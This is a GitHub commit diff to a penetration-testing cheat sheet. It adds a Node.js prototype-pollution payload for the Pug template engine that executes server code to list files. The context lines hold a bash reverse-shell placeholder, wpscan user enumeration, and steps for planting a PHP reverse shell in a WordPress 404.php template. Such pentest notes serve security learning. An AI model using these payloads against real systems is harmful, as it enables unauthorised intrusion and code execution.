Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-08-20 13:48:26 +05:00 committed by GitHub
parent bb86b16be1
commit 560dcaf551
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -546,7 +546,6 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
### Web Shell Bash ### Web Shell Bash
`bash -c "<bash_rev_shell>"` `bash -c "<bash_rev_shell>"`
### Wordpress ### Wordpress
using wpscan we can find users or do some further enumeration of wordpress version using wpscan we can find users or do some further enumeration of wordpress version
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users * `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
@ -563,6 +562,26 @@ To get a RCE
* Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell. * Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell.
* Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one) * Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one)
### Node JS
#### Prototype Pollution
##### PUG
```
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
```
### Apache Tomcat ### Apache Tomcat
``` ```